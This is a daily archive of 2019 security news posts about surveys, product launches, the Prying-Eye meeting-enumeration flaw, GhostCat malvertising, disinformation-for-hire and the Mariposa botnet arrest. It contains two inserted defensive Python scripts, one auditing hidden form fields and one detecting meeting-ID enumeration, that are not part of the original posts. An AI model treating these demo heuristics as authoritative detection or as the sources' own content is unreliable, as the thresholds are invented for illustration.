Daily Archives: October 1, 2019

The 5 biggest examples of executive threats and how to prevent them

Many executives focus their security efforts and budgets solely on physical threats, but attacks targeting an executive’s digital presence can be just as dangerous. Criminals are looking to exploit the wealth of high-profile and high net-worth individuals—or cause them embarrassment or personal harm—at an unprecedented rate. And, as the most abundant source of company secrets and IP, they’re a primary attack vector of their businesses too. Attacks on VIPs involve attempts at accessing their sensitive … More

The post The 5 biggest examples of executive threats and how to prevent them appeared first on Help Net Security.

49% of infosec pros are awake at night worrying about their organization’s cybersecurity

Six in every ten businesses have experienced a breach in the last three years. At least a third of infosec professionals (36%) whose employers had not recently been a victim of a cyber attack also believe that it is likely that they are currently facing one without knowing about it. This may be an indicator of a bumper year for breaches, as the total number of organizations reporting breaches in 2018 only came … More

The post 49% of infosec pros are awake at night worrying about their organization’s cybersecurity appeared first on Help Net Security.

Massive uptick in eCrime campaigns, retail among top targeted industries

There has been a massive uptick in eCrime cyber activity, a CrowdStrike report reveals. As Gartner states in the 2019 Magic Quadrant for Endpoint Protection Platform, “The skills requirement of EDR solutions compounded by the skills gap in most organizations is an impediment to the adoption of EDR in the mainstream market. As a result, product vendors are increasingly offering a fusion of products and services ranging from light incident response and monitoring through full … More

The post Massive uptick in eCrime campaigns, retail among top targeted industries appeared first on Help Net Security.

Aussies Fear Snakes, Spiders and Getting Hacked

Fears and phobias. We all have them. But what are your biggest ones? I absolutely detest snakes but spiders don’t worry me at all. Well, new research by McAfee shows that cybercriminals and the fear of being hacked are now the 5th greatest fear among Aussies.

With news of data breaches and hacking crusades filling our news feeds on a regular basis, many of us are becoming more aware of and concerned about the threats we face in our increasingly digital world. McAfee’s latest research confirms this, with hackers making their way into Australia’s Top 10 Fears.

According to research conducted by McAfee, snakes are the top phobia for Aussies, followed by spiders, heights and sharks. Cybercriminals and the fear of being hacked come in 5th place, beating the dentist, bees, ghosts, aeroplane travel and clowns!

Aussie Top 10 Fears and Phobias

  1. Snakes
  2. Spiders
  3. Heights
  4. Sharks
  5. Hackers/Cybercriminals
  6. The dentist
  7. Bees or wasps
  8. Ghosts
  9. Aeroplane travel
  10. Clowns

Why Do We Have Phobias?

Fears and phobias develop when we perceive that we are at risk of pain or, worse still, death. And while almost a third of respondents nominated snakes as their number one fear, there is a less than one-in-fifty-thousand chance of being bitten badly enough by a snake to warrant going to hospital in Australia, according to research from the Internal Medicine Journal.

In contrast, McAfee’s analysis of more than 108 billion potential online threats between October and December 2018 identified 202 million of these threats as genuine risks. With a global population of 7.5 billion, that means there is approximately a one in 37 chance of being targeted by cybercrime. While this is not a life-threatening situation, these statistics show that the chance of being affected by an online threat is very real.

What Are Our Biggest Cyber Fears?

According to the research, 82% of Aussies believe that being hacked is a growing or high concern. And when you look at the sheer number of reported data breaches so far this year, these statistics make complete sense. Data breaches have affected Bunnings staff, Federal Parliament staff, Marriott guests, Victorian Government staff, QLD Fisheries members, Skoolbag app users and Big W customers plus many more.

Almost 1 in 5 (19%) of those interviewed said their top fear at work is doing something that will result in a data security breach, leaking sensitive information or infecting their corporate IT systems.

The fear that we are in the midst of a cyberwar is another big concern for many Aussies. Cyberwar can be explained as a computer or network-based conflict where parties try to disrupt or take ownership of the activities of other parties, often for strategic, military or cyberespionage purposes. 55% of Aussies believe that a cyberwar is happening right now but we just don’t know about it. And a fifth believe cyber warfare is the biggest threat to our nation.

What Can We Do to Address Our Fear of Being Hacked?

Being proactive about protecting your online life is the absolute best way of reducing the chances of being hacked or being affected by a data breach. Here are my top tips on what you can do now to protect yourself:

  1. Be Savvy with Your Passwords

Using a password manager to create unique and complex passwords for each of your online accounts will definitely improve your online safety. If each of your online accounts has a unique password and you are involved in a breach, the hacker won’t be able to use the stolen password details to log into any of your other accounts.

  2. Stop AutoFill on Chrome

Storing your financial data within your browser and being able to populate online forms within seconds makes the autofill function very attractive, but it is risky. Autofill will automatically fill out all forms on a page regardless of whether you can see all the boxes. You may think you are only entering your email address into an online form, but a savvy hacker could easily design an online form with hidden boxes designed to capture your financial information. So remove all your financial information from Autofill. I know this means you will have to manually enter information each time you purchase, but your personal data will be better protected.
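The risk described in this tip can be checked for on the defensive side: a site owner (or a curious user with the page source) can audit a form for fields that a visitor would never see but that carry payment or address hints a browser might fill. The script below is an added example, not McAfee's code, and the hint list, the visibility heuristics and the sample form are all assumptions constructed for the demo.

```python
# Added example (not from the McAfee post): audit an HTML form for fields
# that are invisible to the visitor yet labelled as payment/address data.
# SENSITIVE_HINTS and the visibility heuristics are assumptions for this demo.
from html.parser import HTMLParser

# Substrings (in the field name or its autocomplete token) that suggest
# data a visitor would not knowingly hand to an invisible field.
SENSITIVE_HINTS = ("cc-", "card", "cvc", "cvv", "exp", "address", "postal", "phone", "tel")


class FormFieldAuditor(HTMLParser):
    """Collects form fields that are both hidden and sensitive-looking."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("input", "select", "textarea"):
            return
        a = dict(attrs)  # bare attributes such as `hidden` map to None
        name = (a.get("name") or a.get("id") or "").lower()
        autocomplete = (a.get("autocomplete") or "").lower()
        style = (a.get("style") or "").replace(" ", "").lower()
        # Heuristic: hidden input type, the `hidden` attribute, or inline
        # CSS that makes the control invisible (opacity:0 also matches 0.x,
        # which is acceptable for an audit that errs on the side of flagging).
        hidden = (
            (a.get("type") or "").lower() == "hidden"
            or "hidden" in a
            or "display:none" in style
            or "visibility:hidden" in style
            or "opacity:0" in style
        )
        sensitive = any(h in name or h in autocomplete for h in SENSITIVE_HINTS)
        if hidden and sensitive:
            self.findings.append(name or autocomplete)


def audit_form(html):
    """Return the names of hidden, sensitive-looking fields in document order."""
    parser = FormFieldAuditor()
    parser.feed(html)
    return parser.findings


# Constructed sample: a newsletter form with two invisible payment fields
# and one legitimate hidden anti-CSRF token (which must not be flagged).
SAMPLE_FORM = """
<form action="/subscribe" method="post">
  <input type="hidden" name="csrf_token" value="abc123">
  <label>Email <input type="email" name="email" autocomplete="email"></label>
  <input type="text" name="card_number" autocomplete="cc-number"
         style="opacity: 0; position: absolute; left: -9999px">
  <input type="text" name="exp" autocomplete="cc-exp" style="display:none">
  <button type="submit">Subscribe</button>
</form>
"""

if __name__ == "__main__":
    for field in audit_form(SAMPLE_FORM):
        print("hidden sensitive field:", field)
```

Run against the sample form, the auditor reports `card_number` and `exp` and stays silent about the CSRF token, which is hidden by design but carries no personal data.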

  3. Think Before You Click

One of the easiest ways for a cybercriminal to compromise their victim is by using phishing emails to lure consumers into clicking links for products or services that could lead to malware, or a phoney website designed to steal personal information. If the deal seems too good to be true, or the email was not expected, always check directly with the source.

  4. Stay Protected While You Browse

It’s important to put the right security solutions in place in order to surf the web safely. Add an extra layer of security to your browser with McAfee WebAdvisor.

  5. Always Connect with Caution

I know public Wi-Fi might seem like a good idea, but if consumers are not careful, they could be unknowingly exposing personal information or credit card details to cybercriminals who are snooping on the network. If you are a regular Wi-Fi user, I recommend investing in a virtual private network (VPN) such as McAfee’s Safe Connect, which will ensure your connection is completely secure and that your data remains safe.

While it is tempting, putting our head in the sand and pretending hackers and cybercrime don’t exist puts ourselves and our families at even more risk! Facing our fears and making an action plan is the best way of reducing our worry and stress. So, please commit to being proactive about your family’s online security. Draw up a list of what you can do today to protect your tribe. And if you want to receive regular updates about additional ways you can keep your family safe online, check out my blog.

‘till next time.

Alex x

The post Aussies Fear Snakes, Spiders and Getting Hacked appeared first on McAfee Blogs.

Cyber risks are the top concern among businesses of all sizes

Cyber risks are the top concern among businesses of all sizes for the first time since the Travelers Companies’ survey began in 2014. Of the 1,200 business leaders who participated in the survey, 55% said they worry some or a great deal about cyber risks, ahead of medical cost inflation (54%), employee benefit costs (53%), the ability to attract and retain talent (46%) and legal liability (44%). As concerns about cyber threats have grown, a … More

The post Cyber risks are the top concern among businesses of all sizes appeared first on Help Net Security.

What’s next for 5G?

The future of 5G lies in the enterprise, states ABI Research. Use cases across different vertical markets, such as industrial automation, cloud gaming, private Long-Term Evolution (LTE), and smart transport systems, will become pervasive, and will unlock new opportunities for Mobile Service Providers (MSPs) along the way. This bright and lucrative future may be hampered by 5G’s past. That’s because early 5G implementations were designed to fit the needs of the consumer market first. “The … More

The post What’s next for 5G? appeared first on Help Net Security.

Titus Accelerator for Privacy reduces financial and legal risk exposure

Titus, the expert in data classification and a Blackstone portfolio company, announced Titus Accelerator for Privacy to reduce financial and legal risk exposure by automatically identifying personal data and applying protection. Unlike other data protection solutions, Titus Accelerator for Privacy examines emails and files at the point of creation. This unique solution takes advantage of machine learning to deliver a faster, more direct path to data privacy and compliance with cybersecurity policies and data privacy … More

The post Titus Accelerator for Privacy reduces financial and legal risk exposure appeared first on Help Net Security.

Revisiting and Revising Some Tips for National Cyber Security Awareness Month

As a regular reader of Tripwire, you are aware that October is National Cyber Security Awareness Month.  Way back in 2015, when the world was an entirely different place, I contributed an article that offered some tips for protecting yourself. Those tips are still relevant: Password management. This should be very old news, but the […]… Read More

The post Revisiting and Revising Some Tips for National Cyber Security Awareness Month appeared first on The State of Security.

How Will the CMMC Impact My Business and How Can We Prepare? Part 3 of 3

Combining Cyber Standards – Is ‘Unified’ Always A Good Approach? The CMMC enforcement model will require a significant adjustment to the way contractors conduct government business – from procurement to execution. In Part 2 of this series, I discussed the possible impacts of having your company’s security rating made public. In Part 3, I would like […]… Read More

The post How Will the CMMC Impact My Business and How Can We Prepare? Part 3 of 3 appeared first on The State of Security.

Avast Business Secure Internet Gateway reduces costs and delivers advanced protection

Avast, a leader in digital security products for business and consumers, announced the launch of Avast Business Secure Internet Gateway (SIG) for its customers. The cloud-based solution offers a global network of always-on security gateways designed to eliminate the many gaps in protection caused by legacy systems, on-premise security hardware, and Unified Threat Management (UTM) appliances. Avast Business SIG replaces traditional security appliances by delivering powerful, cloud-based protection capabilities as a simple-to-consume subscription service, breaking … More

The post Avast Business Secure Internet Gateway reduces costs and delivers advanced protection appeared first on Help Net Security.

Veriff launches NFC verification tool for biometric documents

Veriff, the most secure global verification service provider, launches a near-field communication (NFC) verification tool that enables the company to validate ePassport-compatible identity documents with both iOS and Android devices. Veriff now offers digital ePassport verification on all devices that support ePassport reading, including the most recent Android and iOS devices. The new tool speeds up the verification process, is user friendly and is more secure than photo-based verification. According to Kaarel Kotkas, Veriff CEO … More

The post Veriff launches NFC verification tool for biometric documents appeared first on Help Net Security.

Microchip’s Trust Platform provides secure key storage for low-, mid- and high-volume deployments

As the number and types of connected devices proliferates, market fragmentation and security vulnerabilities in the Internet of Things (IoT) have created significant challenges for developers. Hardware-based security is the only way to protect secret keys from physical attacks and remote extraction, but extensive security expertise, development time and costs are required to configure and provision each device. With companies producing anywhere from hundreds to millions of connected devices per year across the globe, scalability … More

The post Microchip’s Trust Platform provides secure key storage for low-, mid- and high-volume deployments appeared first on Help Net Security.

DataStax unveils Change Data Capture Connector for Apache Kafka

DataStax, the company behind the leading database built on Apache Cassandra, announced early access to the DataStax Change Data Capture (CDC) Connector for Apache Kafka. The DataStax CDC Connector for Apache Kafka gives developers bidirectional data movement between DataStax, Cassandra, and Kafka clusters. CDC is designed to capture and forward insert, update, and delete activity applied to tables (column families). The DataStax CDC Connector for Apache Kafka makes it easier for developers to build globally … More

The post DataStax unveils Change Data Capture Connector for Apache Kafka appeared first on Help Net Security.

AWS IQ enhances customers’ connection and collaboration with AWS-Certified third party experts

Amazon Web Services, an Amazon.com company, announced the general availability of AWS IQ, a new service that helps customers quickly find, engage, and do business with AWS-Certified third party experts for on-demand project work. AWS IQ offers the tools and workspace for more secure collaboration, streamlined project tracking, and integrated billing. To get started, customers simply log into AWS IQ and describe their project needs in a few sentences. They can then chat with experts … More

The post AWS IQ enhances customers’ connection and collaboration with AWS-Certified third party experts appeared first on Help Net Security.

Fusion Risk Management expands its Fusion Framework System platform

Fusion Risk Management, a leading provider of business continuity and risk management software and services, announces the expansion of its flagship platform, Fusion Framework System, to include an advanced set of risk management capabilities for comprehensive management of risk and business continuity. With this release, Fusion Framework enables greater operational resilience by supporting the full risk and continuity spectrum that today’s businesses need. The platform eliminates the need for separate modules across the many areas … More

The post Fusion Risk Management expands its Fusion Framework System platform appeared first on Help Net Security.

Continuum adds new managed detection and response capabilities to its Fortify solution

Continuum, the Platform for What’s Next, announced that it is expanding its Fortify solution with new managed detection and response (MDR) capabilities. Additionally, Continuum will add Fortify for the MSP, specifically to help Managed Service Providers (MSP) protect themselves, given the growing trend of cyber attackers seeking to target and weaponize MSPs. The new MDR enhancements, powered by Fortinet, will help MSPs streamline their cybersecurity processes and better protect their customers with automated correlation across … More

The post Continuum adds new managed detection and response capabilities to its Fortify solution appeared first on Help Net Security.

Teheran: U.S. has started ‘Cyber War’ against Iran

Iran’s Passive Defense Organization chief Gholamreza Jalali declared that the US government has started its cyber war against the country.

Gholamreza Jalali, Iran’s Passive Defense Organization chief, announced that “America has started its cyber war against Iran,” without providing more details.

The news was reported by the ISNA news website on October 1. Jalali also added that Iran “decisively will resort to cyber defense.”

Jalali is an Islamic Revolution Guard Corps (IRGC) brigadier general; in November 2018 he announced that government experts had uncovered and neutralized a new strain of Stuxnet.

“Recently we discovered a new generation of Stuxnet which consisted of several parts … and was trying to enter our systems,” Jalali was quoted as saying by the semi-official ISNA news agency at a news conference marking Iran’s civil defense day.

In May, Jalali had accused the U.S. of carrying out psychological operations (psyops) through social media aimed at influencing Iranians’ sentiment on specific topics. The official also revealed that Iran is targeted by 50,000 cyberattacks, and that the country’s cyber defense suffers eight major attacks annually.

Last week, Iran’s oil minister, Bijan Namdar Zanganeh, ordered companies operating in the energy sector to be on ‘full alert’ to the threat of “physical and cyber” attacks.

“It is necessary for all companies and installations in the oil industry to be on full alert against physical and cyber threats,” reads a statement published on the oil ministry’s Shana website.

Iran fears retaliation from Western countries, which accuse it of carrying out physical and cyber attacks against their infrastructure and against countries in the Middle East.

Military and intelligence experts believe that a Western coalition, driven by the US, could carry out a series of cyber attacks against Iranian critical infrastructure. A few days after the drone attacks, some Western media reported destructive cyber attacks against infrastructure in the Iranian oil sector, but Iran denied it.

Pierluigi Paganini

(SecurityAffairs – Iran, cyberwar)

The post Teheran: U.S. has started ‘Cyber War’ against Iran appeared first on Security Affairs.

Prying-Eye Vulnerability Exposes Online Meetings to Snooping

Web-conferencing users who don't assign passwords could be having online meetings with more people than they think, according to new research.

The Cequence CQ Prime Threat Research team today announced its discovery in July 2019 of a vulnerability in the Cisco Webex and Zoom video-conferencing platforms that potentially exposes millions of online meetings to snooping.  

By launching an enumeration attack that targets web-conferencing APIs with a bot that cycles through (enumerates) and discovers valid numeric meeting IDs, threat actors could exploit the vulnerability to view and listen to active meetings that haven't been protected by a password. 

"In targeting an API instead of a web form fill, bad actors are able to leverage the same benefits of ease of use and flexibility that APIs bring to the development community," said Shreyans Mehta, Cequence Security CTO and co-founder. 

"In the case of the Prying-Eye vulnerability, users should embrace the shared responsibility model and take advantage of the web-conferencing vendors’ security features to not only protect their meetings but also take the extra step of confirming the attendee identities."

Following best practices on vulnerability disclosures, the CQ Prime team notified the impacted vendors and gave them time to validate and respond to the findings.

Richard Farley, CISO of Zoom Video Communications, Inc., said: "Zoom has improved our server protections to make it much harder for bad actors or malicious bots to troll for access into Zoom meetings. In addition to our detection and prevention mechanisms in the data center, we provide meeting hosts with extensive protection controls, such as preventing attendees from joining a meeting before the host, and the very popular waiting room feature."

The Cisco Product Security Incident Response Team (PSIRT) issued an informational security advisory to its Webex customers, but said it "is not aware of any malicious exploitation of this potential attack scenario."

PSIRT said: "Cisco Webex provides the host with controls that protect the meeting—such as disallowing join before host, locking a meeting, as well as ensuring guests do not join without authentication."

Passwords are enabled as a default setting for meetings on both the Zoom and Cisco Webex platforms. However, users who are in the mood to live dangerously have the option to make meetings on both platforms password-free. 
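Both vendors quoted above point to server-side protections against bots that "troll for access". One building block of such protection is telemetry: a source that requests many distinct numeric meeting IDs in a short window, most of them non-existent, looks nothing like a human joining a meeting. The script below is an added example, not Cequence, Zoom or Cisco code; the log format, field names, thresholds and sample lines are assumptions constructed for the demo, and real platforms log their join APIs differently.

```python
# Added example (not from the Cequence / Zoom / Cisco material above):
# flag sources that enumerate numeric meeting IDs through a join API.
# Log format, field names and thresholds are assumptions for this demo.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, one line per "join meeting" API call:
# timestamp, client IP, requested meeting ID, API result.
# 203.0.113.7 sweeps consecutive IDs; the other two sources are ordinary users
# (one of them mistypes an ID once before joining the right meeting).
SAMPLE_LOG = """\
2019-10-01T09:00:01Z 203.0.113.7 meeting_id=500000001 result=not_found
2019-10-01T09:00:02Z 203.0.113.7 meeting_id=500000002 result=not_found
2019-10-01T09:00:03Z 203.0.113.7 meeting_id=500000003 result=not_found
2019-10-01T09:00:04Z 203.0.113.7 meeting_id=500000004 result=not_found
2019-10-01T09:00:05Z 198.51.100.4 meeting_id=731904455 result=ok
2019-10-01T09:00:06Z 203.0.113.7 meeting_id=500000005 result=not_found
2019-10-01T09:00:07Z 203.0.113.7 meeting_id=500000006 result=not_found
2019-10-01T09:00:08Z 198.51.100.9 meeting_id=731904456 result=not_found
2019-10-01T09:00:09Z 203.0.113.7 meeting_id=500000007 result=not_found
2019-10-01T09:00:10Z 198.51.100.9 meeting_id=731904465 result=ok
2019-10-01T09:00:11Z 203.0.113.7 meeting_id=500000008 result=ok
2019-10-01T09:30:00Z 198.51.100.4 meeting_id=842211903 result=ok
"""


def parse_line(line):
    """Split one assumed-format log line into a dict."""
    ts, ip, mid_field, res_field = line.split()
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "ip": ip,
        "meeting_id": mid_field.split("=", 1)[1],
        "result": res_field.split("=", 1)[1],
    }


def find_enumerators(log_text, window=timedelta(minutes=5),
                     min_distinct=5, min_fail_ratio=0.6):
    """Return {ip: (distinct_ids, failure_ratio)} for sources that requested
    at least `min_distinct` different meeting IDs inside any `window`-long
    span, with at least `min_fail_ratio` of those requests failing.
    The tuple kept per IP is the one with the most distinct IDs seen."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            e = parse_line(line)
            events[e["ip"]].append(e)

    flagged = {}
    for ip, evs in events.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans <= `window`.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            distinct = {e["meeting_id"] for e in win}
            failures = sum(1 for e in win if e["result"] != "ok")
            ratio = failures / len(win)
            if len(distinct) >= min_distinct and ratio >= min_fail_ratio:
                prev = flagged.get(ip)
                if prev is None or len(distinct) > prev[0]:
                    flagged[ip] = (len(distinct), ratio)
    return flagged


if __name__ == "__main__":
    for ip, (n, ratio) in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: {n} distinct meeting IDs, {ratio:.0%} failures")
```

On the sample log only `203.0.113.7` is flagged (8 distinct IDs, 87.5% failures); the user who mistyped one ID is not, because two IDs fall below the threshold. The failure ratio matters more than the raw request count: a scanner that finds an unprotected meeting still produces a long trail of `not_found` responses on the way, which is exactly what the enumeration described in the article leaves behind and what a rate limit or block decision can key on.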

Singapore presented the Operational Technology (OT) Cybersecurity Masterplan

The Cyber Security Agency of Singapore (CSA) presented the Operational Technology (OT) Cybersecurity Masterplan to increase the resilience of Critical Information Infrastructure (CII) sectors.

The Cyber Security Agency of Singapore (CSA) presented the Operational Technology (OT) Cybersecurity Masterplan to enhance the security and resilience of Singapore’s Critical Information Infrastructure (CII) sectors in delivering essential services.

Operational Technology (OT) systems are becoming a privileged target for highly-sophisticated threat actors, for this reason, CSA is going to propose measures to increase the resilience of these systems to cyber attacks.

“The Masterplan serves to improve cross-sector response to mitigate cyber threats in the OT environment and to strengthen partnerships with industry and stakeholders.” reads the announcement published by the CSA. “The OT Cybersecurity Masterplan outlines key initiatives covering the areas of People, Processes and Technology to uplift the of our CII owners and that operate OT systems.”

Singapore is one of the most hyper-connected commercial hubs; for this reason, it is essential to adopt all the necessary countermeasures to repel any kind of attack.

Key points in the OT Cybersecurity Masterplan include:

  1. Providing OT cybersecurity training to develop human capabilities
  2. Facilitating the sharing of information through an OT Information Sharing and Analysis Centre (OT-ISAC)
  3. Strengthening OT owners’ policies and processes through the issuance of an OT Cybersecurity Code of Practice (CCoP)
  4. Adopting technologies for cyber resilience through Public-Private Partnerships

The Masterplan encourages OT equipment manufacturers and service providers to implement the best cybersecurity practices by design.

“The OT Cybersecurity Masterplan will serve as a strategic blueprint to guide Singapore’s efforts to foster a resilient and secure cyber environment for our OT CII, while taking a balanced approach between security requirements, rapid digitalisation and ease of conducting business-as-usual activities.” concludes the announcement.

The Singapore OT Cybersecurity Masterplan is available at the following URL:

https://www.csa.gov.sg/~/media/csa/documents/publications/ot_masterplan/otcybersecuritymasterplan.pdf

Pierluigi Paganini

(SecurityAffairs – Cybersecurity Masterplan, Operational Technology)

The post Singapore presented the Operational Technology (OT) Cybersecurity Masterplan appeared first on Security Affairs.

Publishers Targeted by GhostCat Malware

A malicious campaign that waged 13 attacks against hundreds of well-known publishers has been identified and put down by The Media Trust.  

Rather appropriately for the Halloween season, the malware was given the name GhostCat-3PC by researchers in the Trust's Digital Security & Operations (DSO) team. 

GhostCat-3PC ran behind an ad that used advanced, obfuscated code and delivery patterns to evade detection by the traditional signature-based ad blockers used by many of the publishers. 

After a quick prowl to check if the user was on a list of targeted domains, GhostCat would initiate a fraudulent pop-up that, if clicked, led to malicious content. 

The team discovered the malware in late August and observed it escalate its attack until well into September.

"What makes GhostCat-3PC unique is the scale of this highly orchestrated campaign, the sophistication of obfuscation techniques to outsmart security tools, and what appears to be an attempt to test and track the response of signature-based security defenses," Mike Bittner, The Media Trust's associate director of digital security and operations, told Infosecurity Magazine.

"Bad actors behind GhostCat-3PC know what blockers are present in these publications and are likely using these attacks as a kind of stress test to determine the risk of being discovered and impeded."

In a report published today, the DSO researchers explained how the creators of GhostCat hid malicious code inside seemingly innocuous code to get the malware past ad blockers. 

The researchers wrote: "Most blockers work by detecting known malicious signatures found in an ad tag or on a publisher site. These signatures are typically static in nature and therefore must result in an exact match to the malicious code in order to be successful. Any change to the targeted code, no matter how minor, will prevent the blocker from producing a match to the specified signature."

The Media Trust sees an average of 1,000 active, unrelated incidents in any 24-hour period, and more than 170 newly minted malicious domains each day. 

Asked how new ad blockers need to be to have any kind of effect against this continually evolving threat, Bittner told Infosecurity Magazine: "Pre-2019 blockers would be useless.

"Signature-based defenses like conventional blockers will have to update their keyword blocklists many times each day just to keep up with bad actors’ relentless assault. Just this past month, five premium publishers using conventional blocking solutions have had at least one major incident unrelated to GhostCat-3PC."

Researchers Find New Hack to Read Content Of Password Protected PDF Files

Looking for ways to unlock and read the content of an encrypted PDF without knowing the password? Well, that's now possible, sort of—thanks to a novel set of attacking techniques that could allow attackers to access the entire content of a password-protected or encrypted PDF file, but under some specific circumstances. Dubbed PDFex, the new set of techniques includes two classes of attacks

Forrester names Microsoft a Leader in 2019 Endpoint Security Suites Wave

As we continue as a company to empower every person on the planet to achieve more, we keep delivering on our mission through products that achieve the highest recognition in the industry. For the last several years we’ve been working hard to provide the leading endpoint security product in the market.

Today, we are proud to announce that Microsoft is positioned as a leader in The Forrester Wave™: Endpoint Security Suites, Q3 2019, receiving among the second highest scores in both the strategy and market presence categories. According to Forrester, “Microsoft has a compelling vision for the future where endpoint threat prevention and detection are completely integrated and inseparable.”

We believe this latest recognition represents our ability to provide best-in-class protection and deliver on innovations that learn and evolve to keep pace with today’s threat landscape.

This recognition comes at a great point in our evolution journey. We are guided by a strong vision to provide the industry-best protection and we are committed to continue pushing the limits in protection, detection, and response capabilities to secure our customers.

Download this complimentary full report and read the analysis behind Microsoft’s positioning as a Leader.

For more information on our endpoint protection platform, or to sign up for a trial, visit our Microsoft Defender Advanced Threat Protection (ATP) page.

The Forrester Wave™: Endpoint Security Suites, Q3 2019, Chris Sherman, September 23, 2019.

This graphic was published by Forrester Research as part of a larger research document and should be evaluated in the context of the entire document. The Forrester document is available upon request from https://reprints.forrester.com/#/assets/2/108/RES146636/reports

The post Forrester names Microsoft a Leader in 2019 Endpoint Security Suites Wave appeared first on Microsoft Security.

Canadian government data is getting cloudier, signaling a ‘massive leap of faith’ in public cloud, says Microsoft

The Canadian government’s ongoing effort to adopt the public cloud took another step forward this summer with the help of Microsoft and AWS, representing a “massive leap of faith” in cloud security, according to Peter Melanson, director of federal sales at Microsoft Canada.

“We’re talking about internal workloads of government data…things like human resources systems and financial systems,” he said, referring to the types of workloads the federal government is moving to public cloud.

These workloads fall under the Protected B classification, which according to the Department of Justice, is described as “information where unauthorized disclosure could cause serious injury to an individual, organization or government.” Protected B includes medical information, information protected by solicitor-client or litigation privilege, or received in confidence from other government departments and agencies.

The migration to public cloud is part of the government’s Cloud First Strategy. In 2017, the federal government started to migrate unclassified data to public cloud storage, with the goal to eventually store its Protected B workloads in the same environment as well.

Unsurprisingly, any vendor bidding for the contracts to store these workloads has to clear a high bar. There are 469 separate security controls, as outlined by the Canadian Cyber Security Centre, that the government has to follow, explained Melanson.

“They want to make certain that you are compliant before they put these very intimate workloads up into the public cloud,” indicated Melanson.

It’s not much of a surprise then that SSC selected Azure and AWS, two of the big three public cloud providers, to host its Protected B data.

In April 2019, Shared Services Canada (SSC) signed an enterprise agreement with Microsoft Canada that will provide client departments with access to Microsoft 365. On Aug. 8, SSC signed Cloud Framework Agreements with AWS Canada and Microsoft Azure. The two have various other contracts with the federal government when it comes to hosting some of its unclassified data, a lot of which is done through channel partners.

The two vendors have done a lot over the years to quell the public sector’s fears around public cloud security, indicated a spokesperson for SSC.

“Initial reservations of migrating data to the cloud were based primarily upon concerns about cloud security features. Over the past few years, cloud computing and storage have matured significantly,” they wrote in an email. “The Cloud First Strategy aligns Canada with Australia, New Zealand, United Kingdom and the United States.”

Quoting Sean Roche, the associate deputy director for digital innovation at the Central Intelligence Agency, Rejean Bourgault, country manager for public sector at AWS Canada, emphasized the acceptance of cloud security among governments.

“On its weakest day, the cloud is more secure than a client service solution,” Bourgault recited. “On a global basis, AWS has more than 5,000 government agencies using AWS at all classification levels…all the way up to Top Secret.”

Russian Underground Sells Disinformation Services to Influence Western Media

Engaging threat actors to launch a disinformation campaign in the Western media is "alarmingly simple and inexpensive" according to a new report.

Using the Recorded Future platform, Insikt Group researchers set up a fake company located in a Western country to gain insight into the chilling world of disinformation. Researchers then hired two sophisticated disinformation vendors, which they found on a Russian-speaking underground forum, to influence public perception of the fictitious company.

The first vendor, given the code name Raskolnikov in the report (presumably as a nod to Dostoevsky's protagonist in Crime and Punishment), was engaged to paint a positive picture of the company. The second vendor, code-named Doctor Zhivago, was hired to destroy the reputation of the company, which was code-named Tyrell Corporation in the report. 

Researchers were able to launch a customizable month-long media campaign with each vendor for only a few thousand dollars. Services ranged from $8 for a social media post to $1,500 for SEO services and traditional media articles.

Raskolnikov created accounts for Tyrell Corporation on major Western social media platforms and gathered over 100 followers on each account. They offered a price list for sharing content on 45 websites, including ft.com, thelondoneconomic.com, eveningexpress.co.uk, and thefintechtimes.com.  

Insikt Group researchers said: "In two weeks, the Tyrell Corporation was in the 'news'—one of the media sources was a less established media outlet, though the other was a very reputable source that had published a newspaper for nearly a century."

Doctor Zhivago claimed to work with a team that included journalists, editors, translators, search engine optimization (SEO) specialists, and hackers. The threat actor used social media to spread claims that Tyrell Corporation had manipulated employees, and even offered to file a complaint against the company for its supposed involvement in human trafficking. 

Researchers said: "First, a group of older accounts—referred to as 'aged accounts'— that posted links to the articles they had published in media sources was employed. Then, a new batch of accounts that reposted content from the aforementioned aged accounts to amplify the messages was used. 

"These new accounts befriended citizens living in the same country the Tyrell Corporation was located in to make the campaign more effective by targeting the audience."

Commenting on the research, Roman Sannikov, head of analyst services at Recorded Future, told Infosecurity Magazine: "We were surprised by how professional the vendors seemed to be. They provided much better customer service than your typical underground threat actor. They were there to provide us with advice on how we should carry out the campaigns and were very responsive to our questions and requests."

Asked how the research has shaped his view of the world, Sannikov said: "I think we already suspected that this was going on, though the fact that these threat actors were able to carry out the campaigns so quickly, inexpensively, and effectively in the West was certainly jarring.

"It underscores how important this issue is, not only when it comes to the public sector, but for private companies and individuals as well. We hope that our research will open people's eyes to this problem before it becomes pervasive outside of the vendors' traditional markets of Russian-speaking countries and Eastern Europe."

Mariposa Botnet Author, Darkode Crime Forum Admin Arrested in Germany

A Slovenian man convicted of authoring the destructive and once-prolific Mariposa botnet and running the infamous Darkode cybercrime forum has been arrested in Germany on request from prosecutors in the United States, who’ve recently re-indicted him on related charges.

NiceHash CTO Matjaž “Iserdo” Škorjanc, as pictured on the front page of a recent edition of the Slovenian daily Delo.si, is being held by German authorities on a US arrest warrant for operating the destructive “Mariposa” botnet and founding the infamous Darkode cybercrime forum.

The Slovenian Press Agency reported today that German police arrested Matjaž “Iserdo” Škorjanc last week, in response to a U.S.-issued international arrest warrant for his extradition.

In December 2013, a Slovenian court sentenced Škorjanc to four years and ten months in prison for creating the malware that powered the ‘Mariposa’ botnet. Spanish for “Butterfly,” Mariposa was a potent crime machine first spotted in 2008. Very soon after its inception, Mariposa was estimated to have infected more than 1 million hacked computers — making it one of the largest botnets ever created.

An advertisement for the ButterFly Bot.

Škorjanc and his hacker handle Iserdo were initially named in a Justice Department indictment from 2011 (PDF) along with two other men who allegedly wrote and sold the Mariposa botnet code. But in June 2019, the DOJ unsealed an updated indictment (PDF) naming Škorjanc, the original two other defendants, and a fourth man (from the United States) in a conspiracy to make and market Mariposa and to run the Darkode crime forum.

